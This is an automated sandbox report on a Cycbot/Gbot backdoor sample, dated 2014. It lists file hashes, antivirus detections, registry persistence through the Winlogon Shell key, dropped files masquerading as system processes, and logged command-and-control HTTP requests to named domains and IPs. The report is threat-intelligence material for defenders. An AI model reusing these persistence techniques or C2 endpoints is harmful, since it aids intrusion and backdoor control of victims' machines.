Analysis Date: 2014-10-14 21:53:21
MD5: f21a2ddb6dda772e43e7f855f906cc35
SHA1: 0f970ddf8da5d61badd075a2e295fa74fcb333cf

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: 7924a4932ac655c61839c9fda3c17e47 sha1: bdd6b05d845af420d04b8fb34cf2bdb652ffb4dd size: 112640
Section: .rdata md5: 716381ad0071de2e288e87443bf6a2ae sha1: a7767ec037ab98588eee1966191f39493061063d size: 1024
Section: .data md5: e91ba0ff1360a232fd67f93c7a23fb16 sha1: e799c5ed62a877488fa95bd9f24ec5800205009f size: 68608
Section: .reloc md5: 2d8ba3dcabf747005e6f9e4462a5efdc sha1: f2b079031352d18e342627a16e83b1638c0d00ee size: 1024
Timestamp: 2005-09-03 05:09:52
PEhash: 5fb775f73fda34accdc393c048db5f1a05db4fac
IMPhash: 37f737a0900fe555627b94358b49bdb9
AV 360 Safe: Gen:Heur.Conjar.5
AV Ad-Aware: Gen:Heur.Conjar.5
AV Alwil (avast): Cybota [Trj]
AV Arcabit (arcavir): no_virus
AV Authentium: W32/Goolbot.K.gen!Eldorado
AV Avira (antivir): TR/Crypt.ZPACK.Gen
AV BullGuard: Gen:Heur.Conjar.5
AV CA (E-Trust Ino): Win32/FakeAlert.J!generic
AV CAT (quickheal): Backdoor.Cycbot.B
AV ClamAV: Win.Trojan.Cycbot-3984
AV Dr. Web: BackDoor.Gbot.73 - infected, incurable
AV Emsisoft: Gen:Heur.Conjar.5
AV Eset (nod32): Win32/Kryptik.SYW
AV Fortinet: W32/Kryptik.SMY!tr.bdr
AV Frisk (f-prot): W32/Goolbot.K.gen!Eldorado
AV F-Secure: Rogue:W32/OpenCloud.A
AV Grisoft (avg): Win32/Cryptor
AV Ikarus: Backdoor.Win32.Cycbot
AV K7: Backdoor ( 003210941 )
AV Kaspersky: Trojan.Win32.Generic
AV MalwareBytes: Backdoor.Bot
AV Mcafee: BackDoor-EXI.gen.n
AV Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV MicroWorld (escan): Gen:Heur.Conjar.5
AV Norman: win32/Gbot.AX
AV Rising: Backdoor.Win32.Cycbot.a
AV Sophos: Mal/FakeAV-IS
AV Symantec: Backdoor.Cycbot!gen7
AV Trend Micro: BKDR_CYCBOT.SME3
AV VirusBlokAda (vba32): BScope.DeadCryptor.01597
AV Yara APT: no_virus
AV Zillya!: Trojan.Kryptik.Win32.132812

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝ explorer.exe,C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Mutex: {45BCA615-C82A-4152-8857-BCC626AE4C8D}
Creates Mutex: {5A92A751-F926-4BB9-872E-BEC4A4CD571F}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: {35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNS: regsysonline.com
Winsock DNS: 127.0.0.1
Winsock DNS: japanesegreenteaonline.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\2913_appcompat.txt
Creates File: PIPE\lsarpc
Creates Process: C:\WINDOWS\system32\drwtsn32 -p 1992 -e 152 -g
Creates Process: C:\WINDOWS\system32\dwwin.exe -x -s 196

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\WINDOWS\system32\dwwin.exe -x -s 196

Process
↳ C:\WINDOWS\system32\drwtsn32 -p 1992 -e 152 -g

Network Details:

DNS: japanesegreenteaonline.com
Type: A
66.117.0.221
DNS: zonedg.com
Type: A
141.8.225.80
DNS: zonedg.com
Type: A
141.8.225.80
DNS: regsysonline.com
Type: A
HTTP GET: http://japanesegreenteaonline.com/assets/images/greentea-cha-1.gif?v76=89&tq=gHZutDyMv5rJeTbia9nrmsl6giWz%2BJZbVyA%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJuX%2BSNzVKv975Xlm5G
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2F82%2BcoJtX%2BSNxr5ygm1C4lKv975Xlm5G
User-Agent: mozilla/2.0
Flows TCP: 192.168.1.1:1031 ➝ 66.117.0.221:80
Flows TCP: 192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1035 ➝ 141.8.225.80:80

Raw Pcap
Strings